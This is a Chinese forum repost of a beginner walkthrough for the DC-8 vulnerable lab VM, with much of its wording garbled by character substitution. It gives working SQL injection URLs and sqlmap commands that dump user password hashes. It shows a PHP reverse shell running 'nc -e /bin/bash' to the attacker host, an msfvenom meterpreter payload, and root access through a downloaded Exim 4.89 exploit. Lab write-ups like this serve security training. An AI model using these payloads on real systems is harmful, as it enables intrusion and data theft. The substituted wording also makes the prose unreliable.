靶机DC-8(详细渗透,适合新手渗透)

闲聊 闲聊 1509 人阅读 | 0 人回复

<
目录



靶机DC-8 (具体浸透,合适新脚浸透)

0x01靶机形貌

靶机疑息
链接https://www.vulnhub.com/entry/dc-8,367/公布日期2019年9月4日做者DCAU易度俭朴0x02情况拆建

1. 下载并导进靶机

翻开vmware-文件-翻开-DC-8.ova
150032d33g60ttw0356gs9.jpg
150033sfuuajqnuau7hon7.jpg

2. 检察收集适配器

将靶机收集适配器改成NAT形式
150033gwebwjjpdg2267v6.jpg

3. 启动靶机

面击 ▶靶机,开启成功
150033lghx4b6kii6xgvvb.jpg

0x03靶机浸透

1、 疑息搜集

1. 主机发明

150034dagvmb934c1bawwv.jpg

150034lk0a1brkl55zm3mn.jpg

2. 端心扫描

150034ajkti15aqr3v05pb.jpg

3. 具体扫描

150034fdr7221fexdbxgdb.jpg

4. 目录扫描

150035jldyxfqezyd2fedf.jpg

5. gobuster目录扫描

为了避免漏扫,gobuster再举办目录扫描
150035mecuemmj8eqmmzmt.jpg

6. 网站指纹辨认

150036ualm7pzoboltobcm.png

2、 缺点开掘

脚工sql注进

1. 经由过程脚工考证,此处url露有sql注进缺点

http://192.168.30.206/?nid=2 and 1=1 --+
150036arpsny2rb45opp9p.jpg

http://192.168.30.206/?nid=2 and 1=2 --+
150036ita5dlwa1artyrrk.jpg

2. 断定字段数

http://192.168.30.206/?nid=2 order by 1 --+
150037pgn9iupwllo3l191.jpg

http://192.168.30.206/?nid=2 order by 2 --+
150037mmh4dvm4gdzcd3v5.jpg

所以能够看出字段数为1
3. 断定显现地位

http://192.168.30.206/?nid=-2 union select 1 --+
150037qmdn8udnmgdgg96g.jpg

4. 检察当前数据库

150038vkrrr2bgrrduucah.jpg

5. 查找库d7db中局部的表

http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+
150038om7hnplnnn69undd.jpg

6. 查找uesrs表中局部的列

http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+
150038l4ty4bggtnb4ztuu.jpg

7. 查询表中的数据

http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+
150039s99xxk7cxr9v7k69.jpg

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+
150039tlj20zughf8e2u3z.jpg

sqlmap主动化施行

1. 查当前数据库

  1. sqlmap -u &#39;http://192.168.30.206/?nid=2&#39; -current-db
复造代码
150040nugkugu4xptghs2g.png
150040ajjmj6ss3yyorzmy.png

2. 查表

  1. sqlmap -u &#39;http://192.168.30.206/?nid=2&#39; -D d7db --tables
复造代码
150040kssy03cbw799fusl.png

3. 查列

  1. sqlmap -u &#39;http://192.168.30.206/?nid=2&#39; -D d7db -T users --columns
复造代码
150040y9xosuco4su48qic.png
150041s2kaaxa9633e6a6r.jpg

4. 查数据

  1. sqlmap -u &#39;http://192.168.30.206/?nid=2&#39; -D d7db -T users -C login,name,pass --dump
复造代码
150041eus63uze8izsbzs4.png
150041l6me0l7gl7lgtdp6.jpg
查询到两组数据
  1. admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
  2. john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
复造代码
4. 操纵John举办暴力破解

150042e78bywe97z631b4y.jpg
破解出john的暗码trutle
5. 能够将破解出去的暗码尝试ssh长途登录

发明ssh长途登录失利,发明需求操纵公公钥登录
150042uihh6nhhmifj1chh.png
150042klcdnnywtsy28yjs.png

6. 正在此网页尝试登录,该网页由前面貌次扫描获得

  1. http://192.168.30.206/user
复造代码
登录成功
150042g4817cyhc575w94h.jpg
150043qga7b8osdkod8mmo.jpg



  • 长途代码施行缺点
1.找到能够编纂php代码的处所

150043bxovmzq7fvuvtfqv.jpg
150043bl4yu8yjzrxorltu.jpg

2.尝试写phpinfo代码

150044lqgm0c3ocqmy5mmz.jpg
150044mhnu4uho2tss6r26.jpg
150044kb1hczz3mz0hw3is.jpg

发明保留并提交后并出有任何显现。根据网上的道法,php代码保留后会施行代码,那该当是正在靶机上曾经施行了代码,只是正在背景没有会显现出去。
3、 缺点操纵

办法一:

1. 编写反弹shell剧本

我们尝试施行PHP反弹shell剧本,将原本的<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
举办保留,避免报错
  1. <p>flag</p>
  2. <?php
  3. system("nc -e /bin/bash 192.168.30.182 4567");
  4. ?>
复造代码
150044yp9wqneev559we5q.jpg

2.保留提交前开启kali举办监听

150045kj5kclyby5lwwdlf.jpg

3. 面击提交发明网页此时正跳转,而我们的进犯机曾经拿到shell

150045qri6znrxu5u69xcq.jpg
150045e8e347whwwzs3xhe.jpg
150046j65rysty0rhfpf0n.jpg

办法两:

1. 操纵msfvenom建造反弹shell剧本

  1. msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999
  2. R >php_shell.txt
复造代码
150046h7tz7o7st3w7oote.jpg

2.将php代码复造到网站中

150046pdaixrdsfctzg2cj.jpg

3. kali设置msf选项,举办监听

150047pljcdjojf7lwdxdx.png
150047ood62zjqv9tni69n.png

150047ap227pmdpfd2ru2u.jpg

4.提交代码(此时背景默许施行所编写的php剧本代码)

150048r82gw5g2ww95z1w2.jpg

5. 拿到shell,并用python翻开一个尺度shell

  1. python -c &#39;import pty;pty.spawn("/bin/bash")&#39;
复造代码
150048jyqee3eq7joqy3o7.jpg

4、 提权

1.find 命令查找具有sudo权限的命令,发明exim4正在操纵时具有root权限`

  1. find / -perm -u=s -type f 2>/dev/null
复造代码
150048mzg5c54gzmg4x8j7.jpg

2.检察命令exim4命令版本

Exim version 4.89
150049rrpxwh8nucehpsr6.jpg

3.操纵serachsploit查找exim命令的缺点

150049awjw4zwehpr95zfr.jpg

4.举办检察用法,发明有两个操纵办法

150050iqyq1zbrx80obq2r.jpg

5.将文件复造到/tmp目录,并用python翻开一个暂时的HTTP效劳

150050sfxzfxh5iolaiot9.png

6.将46996.sh下载到靶机

  1. wget http://192.168.30.182/46996.sh
复造代码
150050ne028zg1v0ooh10o.jpg

举办赋权
150050huzrq5556jco1jvc.png

施行,可是发明两种办法均发作毛病
150051fevo335loy3if73f.png

缘故原由:那个报错是因为windows系统下编纂然后上传到linux系统施行招致的
打点计划:当地编纂检察文件规范:set ff=unix
150051h82yv2yz2oqvkv79.jpg

7.然后我们再从头举办上传

150051ydc9piej3d3cjevb.jpg

操纵第两个提权命令举办提权成功
  1. ./46996.sh -m netcat
复造代码
150052b7vvz76fx7em7m68.jpg

150052ptzq3r385gg9888t.jpg

8.检察<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>


150052kd68nsxq6xsikrrk.jpg

0x04尝试总结

那个靶机考查了目录扫描,sql注进,长途代码施行,反弹shell,提权时操纵find查找能够施行的命令,对命令exim的版本提权缺点等,是一个没有错的靶机,合适新脚去浸透

免责声明:假如进犯了您的权益,请联络站少,我们会实时删除侵权内乱容,感谢协作!
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请您发送邮箱:Cdnjson@163.com提供相关证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
回复 关闭延时

使用道具 举报

 
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则